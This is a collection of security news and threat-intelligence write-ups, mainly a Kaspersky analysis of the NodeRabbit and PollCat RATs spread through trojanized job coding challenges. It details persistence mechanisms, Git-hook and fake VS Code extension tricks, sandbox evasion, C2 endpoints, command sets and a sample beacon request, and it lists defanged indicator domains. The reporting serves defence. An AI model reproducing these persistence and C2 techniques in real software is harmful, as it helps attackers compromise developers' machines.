bug in Kaspersky’s endpoint antivirus product. “So the problem is now leaking outside of Microsoft,” Nightmare said when they published the HardBreacher PoC last week. “There was poll held against either finding a bug in the home or commercial version and the poll results were the commercial version. At the time of writing this, the proof of concept works in a fully patched windows 11 25H2 & Kaspersky for Endpoint v14.0.0.504.” Beaumont confirmed that Nightmare’s HardBreacher exploit code works, as does a PoC for an elevation of privileges vuln in Gen Digital’s Avast antivirus software. This zero-day, named PrettyPrague, “will dump the SAM database by abusing a vulnerability in Avast Sandbox and spawn a full SYSTEM shell,” according to the researcher. "Gen was recently made aware of a security vulnerability affecting a subset of Gen products, including Avast Antivirus, that could allow an attacker to elevate their system privileges," Gen Digital told The Register. "We immediately initiated our security response procedures and are actively developing a patch. We take all security matters seriously and are committed to addressing this issue swiftly." Kaspersky did not immediately respond to The Register’s requests for comment. Nightmare also recently released an Nvidia memory corruption zero-day vulnerability dubbed GreenSection, but according to Beaumont, this one just crashes the system. Nvidia did not respond to our inquiries.® Updated to add at 0905 PT on September 4, 2026 "Kaspersky has resolved the HardBreacher issue. The corresponding fix is delivered via an automatic update, or users can trigger a database update manually," the company told The Register. "During our investigation into the reported issue, we identified an opportunity to enhance our existing behavior-based detections to ensure overall stability and prevent system freezes under certain configurations."
theregister.comSep 3, 2026extracted
Extradited Russian Hacker Faces Charges Over Excel Malware Campaign That Infected Thousands
The U.S. Department of Justice (DoJ) has charged a Russian national, extradited from Cyprus on August 28, with using roughly 255 fake accounts on a freelance platform to send malware-laced Excel attachments to about 80,000 of its users in 2016 and 2017. Searzhudin Tamirlanovich Aktulaev, 40, was arrested in Cyprus in May 2025, the U.S. Attorney's Office for the Northern District of California said in a press release. He made his initial appearance in federal court in San Francisco on August 31 and was remanded to federal custody. The indictment, filed on June 1, 2021, and unsealed the same day as his appearance, describes the platform only as "a well-known freelance employment technology company" based in the Northern District of California. Thousands of computers infected with TVRAT, one of two malware types named in the indictment, were calling back to a command-and-control (C2) domain hosted in the U.S., with approximately half of the victims located in the country, many of them in the district. A shared document in the email account used in the scheme contained e-commerce login credentials and personally identifiable information (PII) for hundreds of victims. Aktulaev is charged with conspiracy to commit wire fraud; transmission of a program, information, code, or command to cause damage to protected computers; conspiracy to commit computer fraud; unauthorized access to a protected computer to obtain information for financial gain and to obtain value; and aggravated identity theft. The indictment alleges that from at least June 2016 through November 2017, the messages carried Excel attachments that prompted recipients to run a macro. The macro then downloaded malware from the internet. The malware came in two types: a variant of TVRAT, a TeamViewer remote access trojan (RAT) also known as TVSPY or TeamSpy, and DarkVNC, both of which gave the operators remote control of the infected computer. Both sent stolen data to the C2 server, from which it was collected and used by Aktulaev and his co-conspirators to commit fraud or other criminal activity, the DoJ said. The DoJ's release says TVRAT exploits a vulnerability in TeamViewer. Russian cybersecurity vendor Kaspersky used the same term in its March 2013 report on TeamSpy, stating that the malicious module "uses a vulnerability in TeamViewer v6 known as Dll-hijacking." "We have no evidence to assume a vulnerability of our software," a TeamViewer spokesman told Security Affairs in February 2017. Avast, which analyzed a TeamSpy sample spread via Excel macros in April 2017, said the macro fetched a password-protected installer that bundles legitimate, digitally signed TeamViewer binaries with a malicious msimg32.dll. The library is loaded in place of the genuine Windows dynamic-link library (DLL) via DLL search order hijacking, which Avast said is "a clever technique" because checking the main executable's signature reveals nothing suspicious. Once loaded, the library hooks nearly 50 Windows Application Programming Interfaces (APIs) to prevent the TeamViewer window and its dialogs from being displayed to the victim. The infected machine then reports its TeamViewer ID to a C2 server. That ID, together with a preset password, is enough for the operators to connect to the computer remotely, Avast said. DarkVNC, for its part, is a hidden virtual network computing (hVNC) utility that was first advertised on the Exploit forum on November 24, 2016, eSentire said in a February 2024 analysis. The tool creates a concealed desktop on the infected machine for the operator to control. Microsoft has blocked Visual Basic for Applications (VBA) macros by default since 2022 in Office files obtained from the internet on Windows devices, the delivery step this campaign relied on. Aktulaev has denied guilt and said he was unaware of the U.S. charges, according to statements from the Russian Embassy in Nicosia, as reported by RIA Novosti and TASS earlier this year. The DoJ noted that the indictment contains allegations only and that Aktulaev is presumed innocent unless and until proven guilty. The development comes as job-hunting and freelancing sites remain a recurring lure for state-sponsored actors, with ESET saying in February 2025 that North Korean hackers were using the same freelance-platform lure against software developers. Last month, fake-recruiter campaigns were documented by Check Point Research, which said a Lazarus Group wave paired fake job offers with a remote-access backdoor, and by the Computer Emergency Response Team of Ukraine (CERT-UA), which said a Sandworm-linked cluster was contacting candidates through job-site chat before pushing a virtual private network (VPN) client that can run commands.
thehackernews.comSep 2, 2026extracted
Iranian Hackers Pose as Recruiters to Deliver Cross-Platform RATs Through Coding Tests
The Iranian Nimbus Manticore hacking group has been attributed to two previously undocumented malware families that highlight the continued evolution of its toolset and likely expand its targeting footprint to infect Linux and Apple macOS systems using cross-platform remote access trojans (RATs) developed using Node.js and JavaScript. Russian cybersecurity company Kaspersky is tracking the malware strains under the names NodeRabbit and PollCat. The first sample of NodeRabbit was discovered on a system in Afghanistan, with subsequent sightings on two distinct machines located in Egypt and Ethiopia. "Its operators deliver [NodeRabbit] through spear-phishing messages on LinkedIn and other job search platforms that contain trojanized coding challenge archives," Kaspersky security researcher Omar Amin said. "Like NodeRabbit, PollCat is a cross-platform RAT, but it is written in obfuscated JavaScript also distributed through trojanized coding challenge archives." While Nimbus Manticore has historically employed malware written in C, C++, and Go, and relied on DLL search-order hijacking techniques to deploy them, the latest findings mark the threat actor's foray into cross-platform tools to accomplish its goals. The development also comes amid a rapid expansion of the hacking group's malware arsenal in recent months, including - A Windows backdoor called NightLedger Two custom WebSocket tunnelers, BridgeHead and ArcBridge A reverse SSH tunneling tool A backdoor that shares overlaps with TWOSTROKE The starting point of the suspicious activity observed in the Afghanistan-based system starts with a ZIP file ("Front-Technical-Challenge.zip") hosted on AWS that's assessed to have been delivered as part of a job opportunity for an engineering role. The threat actor is said to have masqueraded as a talent acquisition specialist at a major technology company to approach a software engineer and invited them to complete a technical assignment. It's worth noting that Nimbus Manticore is also tracked under the moniker Iranian Dream Job for its use of recruitment-themed lures to trick prospective targets into infecting their own computers, a tactic long adopted by the North Korea-linked Lazarus Group. The archive contains source code for a project management tool called Taskflow and instructs candidates to "find and fix all bugs in the frontend code" as part of an "engineering challenge" within three hours and without relying on artificial intelligence (AI)-assisted tools. The instructions specifically ask the candidates to refrain from modifying the server component of the application ("server.js"), claiming it's "bug-free and functions correctly." However, it's in this file that the malicious code is embedded. "The first line of server.js imported a trojanized npm package named colorized_terminal, version 2.1.0," Kaspersky said. "The attackers bundled the package directly in the challenge task archive's node_modules directory rather than publishing it to the npm registry. When imported, the package silently launched an implant from node_modules/.cache/.320697f1/index.js as a detached background process." The implant in question is NodeRabbit, which communicates with one of three Azure-hosted command-and-control (C2) addresses ("plugplay.azurewebsites[.]net," "rgbteller.azurewebsites[.]net," and "wslwebui.azurewebsites[.]net") through three distinct API endpoints - /api/rabbit/checkin, to register agent and host information /api/rabbit/task, to poll for commands /api/rabbit/result, to send task results The malware supports 11 commands that allows it to gather host details, list running processes, execute arbitrary shell commands, enumerate directories, read a file in chunks and return Base64-encoded data, decode Base64-encoded text and write it at a chosen file offset, delete a file or recursively delete a directory, create directories recursively, enumerate adapters, MAC addresses, IP addresses, and DNS settings, and alter beacon interval. Another notable capability of NodeRabbit is to write a Base64-encoded Node.js script to a randomly named ".tmp" file, execute it, and then delete it to cover up traces of malicious activity. Kaspersky said it identified two more variants of NodeRabbit that share the same code lineage, each recovered from Egypt and Ethiopia - A second variant that uses a different trojanized npm package named pretty-log (version 2.1.0) instead of colorized_terminal, while also partially implementing corporate proxy support and terminating if found to be running in an analysis environment A third variant that's also launched using the pretty-log npm package but uses a different set of API endpoints to accomplish the same tasks - - /sdk/v2/ready - /sdk/v2/config - /sdk/v2/events Persistence is achieved depending on the operating system: a Windows Run registry key on Windows, a cron entry for Linux, and a launch agent on macOS. The persistence mechanism mimics either a Microsoft Edge browser update (first variant) or Intel's Driver & Support Assistant (second variant). The third variant, on the other hand, does not impersonate any legitimate software, but also takes into account the Windows Subsystem for Linux (WSL) to create a daily 10 a.m. Windows task that launches a Visual Basic Script file through "wscript.exe" and "wsl.exe." In addition, it features 12 new commands to - Enumerate accessible Windows drive letters or WSL-mounted drives Execute a process Kill process by PID or image name Replace the active C2 server and attempt to keep the new configuration Return the current C2 server Harvest account addresses from Outlook OST and PST artifacts Attempt to install a fake VS Code extension named "GitHub Copilot Helper" and Windows Run value for added persistence Check selected VS Code, scheduled-task, and Run-key persistence indicators Remove the fake extension Search recent and common development locations for Git repositories Inject a launcher into a repository's Git hooks for added persistence Remove the marked Git-hook launcher Nimbus Manticore has also been observed using programming challenge lures ("RankChallenge-react-6uJSX3-main.zip") distributed via time-limited developer assessments to deliver PollCat. "Although the visible exercise is not a security CTF, the project uses CTF terminology in several places," Kaspersky said. "The root package is named ctf-server, the backend prints CTF server running, the frontend uses several ctf-* storage keys, and the tutorial refers to path/to/ctf." "These repeated labels, together with instructions that do not fully match the delivered application, are consistent with an AI-assisted or template-generated project. One possible explanation is that the attacker prompted an AI coding assistant to create a CTF-style React platform and later inserted the malicious components." A PDF tutorial present within the archive prompts the target to click "Continue" and enter an attacker-supplied six-digit one-time password (OTP) that's refreshed every 30 seconds, and complete the challenge within a one-hour session. The compressed timeline to activate the assessment is likely an attempt to create a false sense of urgency and make them run the project as soon as possible to increase the likelihood of an infection. Despite the one-hour session window, PollCat runs independently of the OTP authentication process, unaffected by the success or failure of the OTP validation step. A failed validation prevents the victim from accessing the protected challenge features, while a successful OTP validation issues a JWT and starts an additional PollCat instance. For persistence, the malware creates a daily scheduled task on Windows, Linux, or macOS, and then connects to a C2 server to send basic host information and await further instructions. It supports 22 commands and communicates via seven API endpoints - /beacon, to register the client and obtain a socketId /gate/hello, to send host, user, domain, operating system information, and its current privilege level /gate/fetch?token= , to poll for commands /gate/submit, to submit a Base64-encoded command-result structure /vault/ , to fetch a hosted file and write it to the victim machine /vault/push, to upload a local file or file chunk to the C2 /gate/track, to report chunk-upload progress The commands span the typical backdoor gamut, enabling the operator to perform file operations, execute shell commands, upload/download files, run JavaScript, load DLLs, create or extract a ZIP archive, and enumerate running processes, drives, volumes, or mount points. Three commands, namely WS_DOWNLOAD, REQUEST_ELEVATION, and PERSIST, are currently not implemented. PollCat also searches for folders matching 24 hard-coded strings corresponding to software and security vendors, including Google, Microsoft, Palo Alto Networks, Cisco, VMware, Fortinet, Citrix, Check Point, Juniper Networks, LogMeIn, Sophos, Symantec, Trend Micro, McAfee, Kaspersky Lab, ESET, Bitdefender, Avast, CrowdStrike, SentinelOne, Malwarebytes, Brave, Tencent, and Naver. When a matching folder is found, the malware inventories the folder's root contents but does not recursively scan the product's directory. The results are then transmitted in the form of JSON to the "/api/system-details/result" endpoint. The activity's links to Nimbus Manticore stem from the structural, command fetching, beacon timing, and command set similarities between PollCat and MiniFast (aka MiniUpdate or Retrograde), a backdoor previously attributed to the group, as well as the use of Azure Websites and Cloudflare‑backed domains for C2. "The shift to cross-platform scripting gives the operators a single codebase that runs on Windows, Linux, and macOS, with payloads that blend naturally into developer workstations," Kaspersky said. "The delivery mechanism, however, remains consistent with Mirage Kitten’s historical tradecraft: the use of recruiter personas on LinkedIn to target critical sectors across the Middle East and Africa for cyber espionage purposes."
thehackernews.comSep 1, 2026extracted
Mirage Kitten targeting aviation and FinTech sectors across the Middle East and Africa with a new malware set
While monitoring Mirage Kitten activity, we uncovered a previously undocumented malware family that we dubbed NodeRabbit. We identified the first sample on a system in Afghanistan. Further threat hunting revealed two additional, more advanced, variants: one on a system in Egypt and another on a system in Ethiopia. NodeRabbit is a cross-platform remote access trojan (RAT) built with Node.js. It targets Windows, Linux, and macOS. Its operators deliver it through spear-phishing messages on LinkedIn and other job search platforms that contain trojanized coding challenge archives. During the same investigation, we discovered another previously undocumented malware family that we dubbed PollCat. Like NodeRabbit, PollCat is a cross-platform RAT, but it is written in obfuscated JavaScript also distributed through trojanized coding challenge archives. Mirage Kitten has historically relied on native malware written in languages such as C, C++, and Go, often deploying it through DLL search-order hijacking. NodeRabbit and PollCat represent the first publicly documented use of Node.js- and JavaScript-based malware by this APT group. Kaspersky’s products detect this threat as Trojan.JS.MirageKitten.* Background During recent threat research, we detected suspicious activity on a system in Afghanistan. We traced it to an archive containing a software development project that the user may have received during a job application process. The archive purported to contain a coding challenge for candidates applying for an engineering role. The archive, Front-Technical-Challenge.zip (MD5: 1EA83E4E4592B01E4ACAB63EB867BEE5 ), was hosted in an Amazon S3 bucket at: https://oracle-challenge.s3[.]us-east-1.amazonaws[.]com/Front-Technical-Challenge.zip It contained TaskFlow, an app for software engineering assessment built with Express, React, and Vite. The accompanying README instructed the candidate to review the application and fix defects in its frontend. It also claimed that server.js was bug-free and should not be modified, conveniently directing attention away from the only application source file the attackers had altered. README file for a trojanized coding challenge app The README also imposed a three-hour time limit and prohibited the use of AI assistants. Notably, an AI code-review assistant tasked with auditing the project would likely have flagged the suspicious first-line import of an unknown npm package and warned the targeted developer that the project was trojanized. Rules and time limit included in the trojanized coding challenge app README file The first line of server.js imported a trojanized npm package named colorized_terminal , version 2.1.0 . The attackers bundled the package directly in the challenge task archive’s node_modules directory rather than publishing it to the npm registry. When imported, the package silently launched an implant from node_modules/.cache/.320697f1/index.js as a detached background process. Retrospective threat hunting across our telemetry revealed the broader scope of the campaign. We identified three NodeRabbit variants with a shared code lineage; each was recovered from a system in a different country. The operators delivered the variants through similarly themed coding challenges and used two trojanized packages, colorized_terminal and pretty-log , both pinned to version 2.1.0 . The campaign also delivered PollCat, a second RAT with a substantially different structure, through a separate coding challenge lure. We’ll analyze PollCat later in this research. Initial access The infection chain begins with fake recruiter accounts contacting prospective targets on a job search platform. According to a publicly cited source, a threat actor posing as a talent acquisition specialist at a major technology company contacted a software engineer and advertised a job opening, inviting the target to complete a technical assessment. The target received a link to a coding challenge hosted on Amazon S3 and was pressured to download and run the project immediately. This public post matches the delivery chain we reconstructed from our telemetry: recruiter outreach on a job search platform, a coding challenge presented as a technical assessment, and a trojanized project archive hosted on legitimate cloud infrastructure. NodeRabbit RAT: the first variant We discovered the first NodeRabbit variant on a system in Afghanistan. The malware was concealed within the TaskFlow assessment at node_modules/.cache/.320697f1/index.js and executed by the trojanized colorized_terminal package. Once running, NodeRabbit generates a unique agent identifier from available host information. It calculates the SHA-256 hash of the hostname, username, operating system version, architecture, and MAC address, then truncates the result to its first 32 hexadecimal characters. NodeRabbit binds a TCP listener to 127.0.0.1:48739. This listener acts as a single-instance mechanism. If the malware cannot bind to the port, it assumes that another instance is already running and terminates silently. NodeRabbit uses a persistence mechanism for each operating system: Operating system Persistence mechanism Windows Copies itself to %APPDATA%\Microsoft\EdgeUpdate\msedge_update.js; clones the local node.exe to nodew.exe in the same folder and patches its PE subsystem from Console to Windows GUI to suppress the console window; creates HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate registry key executing nodew.exe msedge_update.js Linux Copies itself to ~/.config/microsoft-edge-update/msedge_update.js and creates an @reboot cron entry that invokes the script using the current Node.js executable. macOS Copies itself to ~/.config/microsoft-edge-update , creates ~/Library/LaunchAgents/com.microsoft.edgeupdate.plist configuration file pointing at the copy’s location with RunAtLoad and KeepAlive parameters, and attempts to load it. The malware communicates with its command-and-control servers through three API endpoints, choosing from the following Azure-hosted C2 infrastructure addresses. On failure, it switches to the next C2 address: 1. https://plugplay.azurewebsites[.]net 2. https://Rgbteller.azurewebsites[.]net 3. https://Wslwebui.azurewebsites[.]net Method Endpoint Purpose POST /api/rabbit/checkin Register agent and host info POST /api/rabbit/task Poll for commands POST /api/rabbit/result Submit results NodeRabbit serializes each C2 request object as JSON and wraps it with AES-256-GCM. The AES key is the SHA-256 digest of an ASCII seed embedded into the agent. Every request uses a fresh 12-byte IV and a 16-byte authentication tag: The malware sends encrypted requests using the following structure: { "d": "base64(IV || ciphertext || authentication_tag)", "_r": "8 hexadecimal characters", "_t": "epoch timestamp" } C2 responses are structured the same way and may contain a command to execute. We observed the first NodeRabbit variant supporting 11 commands: Command Functionality sys:info Return hostname, domain user information, username, and process ID. proc:list List running processes. proc:start Execute an arbitrary shell command. fs:list List a directory. fs:read Read a file in chunks and return Base64 data. fs:write Decode Base64 and write it at a chosen file offset. fs:delete Delete a file or recursively delete a directory. fs:mkdir Create directories recursively. net:config Enumerate adapters, MAC addresses, IP addresses, and DNS settings. agent:sleep Change the beacon interval. script:exec Write a base64 Node.js script to a randomly named .tmp file, execute it and delete it. NodeRabbit RAT: the second variant Retrospective threat hunting following the discovery in Afghanistan led us to a second infection on a system in Egypt. This sample is a more advanced NodeRabbit variant, launched through the trojanized pretty-log package instead of colorized_terminal . Before running its core functionality, the malware checks whether the host resembles an analysis environment. It terminates if it detects limited system memory, a low CPU count, short system uptime, analyst-associated usernames or hostnames, or common analysis tools running on the system. Before terminating, the malware generates benign HEAD requests to www.google.com, www.microsoft.com , and www.cloudflare.com , then exits without ever contacting its C2 infrastructure. Most likely, it attempts to look less suspicious by showing some benign activity before exiting. Variant 2 implements partial corporate proxy support: it checks HTTP(S) proxy environment variables, Windows Internet Settings, including an explicit PAC URL, and WinHTTP configuration; tunnels its HTTPS C2 through HTTP CONNECT . It first tries to establish an unauthenticated connection. If it fails, it retries using URL-embedded basic credentials. Finally, it delegates Windows NTLM/Negotiate challenges to curl.exe --proxy-anyauth --proxy-user . It caches the proxy-discovery result, including when no proxy is found, for five minutes. If the polling loop detects a network-interface or IP-address change, it clears the cache and runs proxy discovery again on the next checkin. To make sure a single instance is running, Variant 2 uses a host-specific port derived from the agent identifier instead of the fixed TCP port used by the first variant. It interprets the first four hexadecimal characters of the identifier as an integer and applies the following calculation: 41984 + (value mod 5000) . The resulting listener port falls between 41984 and 46983 . Unlike the shared port used by Variant 1, this port varies depending on the infected host. For persistence, Variant 2 masquerades as Intel Driver & Support Assistant. The exact persistence mechanism, once again, depends on the operating system. Operating system Persistence mechanism Windows Copies itself to %LOCALAPPDATA%\Intel\DSA\idriver_support.js . It then copies the local node.exe binary to IntelDSA.exe and changes its PE subsystem from Console to Windows GUI, suppressing the console window. Finally, it creates a scheduled task named IntelDriverSupportUpdate , which runs daily at 10AM and executes IntelDSA.exe with the dropped script. Linux Copies itself to ~/.config/intel-dsa/idriver_support.js and creates an @reboot cron entry. macOS Copies itself to ~/Library/Application Support/Intel DSA/idriver_support.js and creates the LaunchAgent com.intel.dsa.helper with RunAtLoad and KeepAlive enabled. NodeRabbit RAT: the third variant Further threat hunting identified a third NodeRabbit variant on a system in Ethiopia. Like the second variant, it is launched through the trojanized pretty-log package. It retains much of the previous variant’s functionality but introduces significant changes to its command-and-control configuration, command set, and persistence mechanisms. The third variant communicates with its C2 infrastructure through a different set of API endpoints: Method Endpoint Purpose POST /sdk/v2/ready Register agent and host info POST /sdk/v2/config Poll for commands POST /sdk/v2/events Submit results We observed the malware using a C2 chain composed of Azure- and Cloudflare-hosted domains. 1. https://visitfinancedentists[.]com 2. https://kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net 3. https://healthcomfsdpower[.]com For persistence, Variant 3 implements the following mechanisms depending on the operating system in use: Operating system Persistence mechanism Windows Attempts to copy the payload to ProgramData or LocalAppData , create a build-specific daily 10AM task, and start the copied payload. To choose the exact directory, it tries to list C:\Windows\System32\config . If successful, it selects ProgramData with /ru SYSTEM /rl highest; in case of a failure, it selects LocalAppData without explicit /ru or /rl settings. macOS Copies the payload to ~/Library/Application Support, creates and loads a RunAtLoad/KeepAlive LaunchAgent and starts the copied payload. Linux Copies the payload to ~/.local/share , attempts to add an @reboot cron entry, and starts the copied payload. If crontab -l fails, persistence is skipped. WSL Uses the payload copied for persistence on the main Linux system, as described above. Writes launcher.vbs under the Windows user profile, and creates a daily 10AM Windows task that relaunches it through wscript.exe and wsl.exe . A new command, agent:servers , replaces the active in-memory C2 server list and can write the updated list to .sv.json . The third variant retains the original 11 commands and adds 12 new ones, bringing the total to 23. New commands Functionality fs:drives Enumerate accessible Windows drive letters or WSL-mounted drives proc:exec Execute a process proc:kill Kill process by PID or image name agent:servers Replace the active C2 and attempt to keep the new configuration agent:getchain Return the current C2 outlook:emails Harvest account addresses from Outlook OST and PST artifacts persist:check Check selected VS Code, scheduled-task, and Run-key persistence indicators persist:vscode Attempt to install a fake VS Code extension and Windows Run value persist:vscode:remove Remove the fake extension persist:projects:scan Search recent and common development locations for Git repositories persist:project:inject Inject a launcher into a repository’s Git hooks persist:project:remove Remove the marked Git-hook launcher Beyond the persistence mechanisms described above, Variant 3 introduces two additional persistence mechanisms that relaunch the malware through common developer workflows. 1. Malicious VS Code extension The persist:vscode command first copies the payload to its build-specific install path. If a compatible extension directory exists, it creates a fake extension displayed as GitHub Copilot Helper , with the description AI coding assistant helper service and the activation event on StartupFinished . The extension’s extension.js file attempts to start the installed payload as a detached Node.js process. To look less suspicious to the user, it uses a trusted publisher name borrowed from local extension metadata or a trustedPublishers value found in state.vscdb . However, no signature or trusted status is copied. Separately, the handler tries to disable Workspace Trust if the VS Code User directory exists. On Windows, it attempts to establish persistence using a current-user Run registry key value even if the extension directory is missing. 2. Git hook injection Git-hook persistence works in two steps. First, persist:projects:scan checks recent VS Code workspace paths directly. Under common locations such as ~/projects and ~/source , it checks only the first 60 immediate children, not the root itself, and returns no more than 20 repositories. For a selected repository, persist:project:inject appends a marked launcher to .git/hooks/post-merge and .git/hooks/post-checkout by default. The marker is # shepherd-persist; the line following the marker attempts to start the installed payload with Node in the background. A later Git operation must trigger one of those hooks, and the referenced Node executable and payload must still exist. PollCat RAT While tracking NodeRabbit infections, we discovered another malicious tool we dubbed PollCat, which is also distributed under the guise of a programming challenge. The sample we obtained resides inside RankChallenge-react , a React code-fixing challenge presented as a time-limited developer assessment. Running the project invokes npm i && node index.js , which starts the local application and attempts to open the challenge in the user’s browser. Although the visible exercise is not a security CTF, the project uses CTF terminology in several places. The root package is named ctf-server , the backend prints CTF server running , the frontend uses several ctf-* storage keys, and the tutorial refers to path/to/ctf . These repeated labels, together with instructions that do not fully match the delivered application, are consistent with an AI-assisted or template-generated project. One possible explanation is that the attacker prompted an AI coding assistant to create a CTF-style React platform and later inserted the malicious components. README instructions and challenge overview included in the trojanized React coding project The PDF tutorial contained in the same archive as the project tells the target to click Continue , enter a six-digit OTP code, and complete the challenge within a one-hour session. It states that codes are supplied by the recruiter, are single-use, and expire quickly; the visible login page also claims that codes rotate every 30 seconds. In the delivery scenario described by the investigation, the threat actor posing as a recruiter could provide the code directly to the targeted developer. This gives the operator control over access to the lure, while the expiring code and countdown create a sense of urgency, pressuring the target to run the project and complete the assessment quickly, potentially accelerating the infection process. One-hour session window enforced by the trojanized coding challenge The bundled .env file contains the JWT signing secret, OTP service URL, and OTP client ID. Configuration embedded in .env file of the trojanized coding project, including the OTP service URL and client identifier The application forwards submitted codes to an attacker-managed domain registered in late June-2026: https://lifespotify[.]com/api/users/b879746e-fed9-4211-a6da-4d8223681267/otp/validate . That said, PollCat starts independently of the OTP authentication process. During application startup, app.js loads requireAuth.js , which imports and immediately starts the malicious requireObjects.js component. PollCat can therefore begin C2 registration and command polling while the application is still loading, before the user enters an access code. A failed OTP validation prevents the user from accessing the protected challenge features, but PollCat continues running in the background. A successful OTP validation issues a JWT and creates another worker that starts an additional PollCat instance. The first authenticated request also triggers the persistence attempt. Persistence starts when the first request carrying a valid JWT reaches the protected middleware. PollCat then uses one of the following methods: Operation system Persistence mechanism Windows Writes package.json and requireObject.js to %APPDATA%\Microsoft\Network, runs npm install, and creates a daily task named NetSync_<username> and scheduled for 09AM that runs the worker with Node.js. Linux Writes the worker to ~/.node_packages, runs npm i, and appends both a daily 09AM cron line and an @reboot line. macOS Uses the same ~/.node_packages copy and cron path, then creates and loads ~/Library/LaunchAgents/com.harsh.requireobject.plist with RunAtLoad and a daily 09AM trigger. Once active, PollCat identifies the host as 129--<hostname> and iterates over the following C2s until registration succeeds: 1. https://sahi-finance[.]com 2. https://GamebarAppinformation[.]azurewebsites[.]net 3. https://GamebarApp[.]azurewebsites[.]net To register, it sends the following HTTP request to the C2: POST /beacon HTTP/1.1 Host: <c2-host> Content-Type: application/json {"clientId":"<client-id>","type":"poll","pcName":"<hostname>","userName":"<username>"} On successful registration, PollCat expects an unusual HTTP 400 response containing a socket identifier and optional timing values: HTTP/1.1 400 Content-Type: application/json {"socketId":"<socket-id>","pollInterval":<poll-interval-ms>,"jitterTime":<jitter-ms>} After registration, PollCat sends host information to /gate/hello , polls /gate/fetch for commands, and returns results through /gate/submit . All endpoints in use are presented in the table below. Method Endpoint Purpose POST /beacon Register the client and obtain a socketId and optional timing values. POST /gate/hello Submit host, user, domain, OS information, and its current privilege level. GET /gate/fetch?token=<socketId> Poll for commands. POST /gate/submit Submit a Base64-encoded command-result structure. GET /vault/<uuid> Retrieve a hosted file and write it to the victim machine. PUT /vault/push/ Upload a local file or file chunk to the C2. POST /gate/track Report chunk-upload progress. By default, PollCat RAT polls every two minutes with up to five seconds of jitter. Commands and results are stored as little-endian binary records and carried as Base64 text. PollCat RAT declares 22 commands, but three of them have no implementation: Command Functionality 0x02 (DIR) List a directory. 0x03 (MV) Move a file or directory. 0x04 (RUN) Execute a shell command. 0x05 (TASKLIST) List running processes. 0x06 (DEL) Delete a file or directory. 0x07 (UPLOAD) Download a file from the C2 to the victim’s machine. 0x08 (DOWNLOAD) Upload a local file to the C2. 0X09 (DRIVES) List drives, volumes, or mount points. 0X0A (TERMINATE) Terminate a process by PID. 0X0B (RUNDLL) Load a DLL and call an exported function on Windows. 0X0C (MKDIR) Create a directory. 0X0D (ZIP) Create or extract a ZIP archive. 0X0E (CHUNKED_DOWNLOAD) Upload a local file in chunks. 0X0F (RUN_HIDDEN) Start a hidden background process. 0X20 (EVAL_JS) Execute JavaScript supplied by the C2. 0X30 (SYSTEM_CHECK) Collect process and software inventory. 0XA1 (WS_DOWNLOAD) Defined but not implemented. 0xB0 (REQUEST_ELEVATION) Defined but not implemented. 0XB1 (PERSIST) Defined but not implemented. 0xF0 (SET_SLEEP_TIME) Change the polling interval. 0XF1 (SET_IDLE_TIME) Store an idle-time value. 0xF2 (SET_JITTER_TIME) Change polling jitter. The command names UPLOAD , DOWNLOAD , and CHUNKED_DOWNLOAD are written from the C2’s perspective. UPLOAD sends a C2-hosted file to the victim’s machine, while the two download commands transfer victim files back to the C2. EVAL_JS runs JavaScript supplied by the C2 and gives that code access to Node.js modules, files, processes, networking, and child-process functions. SYSTEM_CHECK collects the names of running processes and lists files and folders from: %SystemDrive%\Program Files %SystemDrive%\Program Files (x86) %LOCALAPPDATA% %LOCALAPPDATA%\Programs %APPDATA% %USERPROFILE% %APPDATA%\Microsoft\Outlook %LOCALAPPDATA%\Microsoft\Olk\Attachments %USERPROFILE%\Documents It also searches for folders matching 24 hardcoded strings corresponding to security software vendor names: ‘Google’, ‘Microsoft’, ‘Palo Alto Networks’, ‘Cisco’, ‘VMware’, ‘Fortinet’, ‘Citrix’, ‘CheckPoint’, ‘Juniper Networks’, ‘LogMeIn’, ‘Sophos’, ‘Symantec’, ‘Trend Micro’, ‘McAfee’, ‘Kaspersky Lab’, ‘ESET’, ‘Bitdefender’, ‘Avast Software’, ‘CrowdStrike’, ‘SentinelOne’, ‘Malwarebytes’, ‘BraveSoftware’, ‘Tencent’, and ‘Naver’. When PollCat finds a matching folder, it lists that folder’s root contents. It does not recursively scan the entire product directory. The detailed inventory, including process names, directory listings, and collected paths, is sent as JSON to POST /api/system-details/result . Infrastructure Mirage Kitten continues to rely on Azure Websites and Cloudflare-backed domains to hinder infrastructure discovery and tracking. More importantly, the use of Microsoft Azure subdomains for C2 helps the traffic blend into legitimate organizational network activity. In some cases that we encountered during our research, the actors even incorporated the targeted organization’s name into the Azure subdomain, making C2 communications appear more like normal business traffic originating from an employee machine during regular business days. Domain Registrar ASN Malware sample naturalapplication.azurewebsites[.]net retaildemo.azurewebsites[.]net tubitak.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 1 rgbteller.azurewebsites[.]net wslwebui.azurewebsites[.]net plugplay.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 2 crossdwm.azurewebsites[.]net wdisystem.azurewebsites[.]net wslmenus.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 3 dnshnsdev.azurewebsites[.]net hpjumpsrv.azurewebsites[.]net storview.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 4 healthcomfsdpower[.]com visitfinancedentists[.]com NameCheap, Inc. AS 13335 NodeRabbit RAT sample 5 kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net MarkMonitor Inc. AS 8075 greenyjsgfd.azurewebsites[.]net helptellerbls.azurewebsites[.]net timedrv.azurewebsites[.]net userwellgtfs.azurewebsites[.]net MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 6 hecowime-aqdphyd4bbdef6es.westeurope-01.azurewebsites[.]net msmanagementgrp[.]com msmanagementgrpmedia[.]com MarkMonitor Inc. AS 8075 NodeRabbit RAT sample 7 lifespotify[.]com Dynadot AS 8075 PollCat RAT gamebarapp.azurewebsites[.]net gamebarappinformation.azurewebsites[.]net MarkMonitor Inc. sahi-finance[.]com NameCheap, Inc. Based on our analysis of Mirage Kitten’s infrastructure, we identified certain patterns across several command-and-control channels, including msmanagementgrp[.]com and visitfinancedentists[.]com Further investigation based on these patterns led to the discovery of approximately 11 additional infrastructure assets attributed to the same group. Domain Creation date Registrar healthful-hub[.]com 2026-07-03 NameCheap, Inc. neumedicahealthcare[.]com 2026-07-03 NameCheap, Inc. optimumhealthcredit[.]com 2026-07-03 NameCheap, Inc. 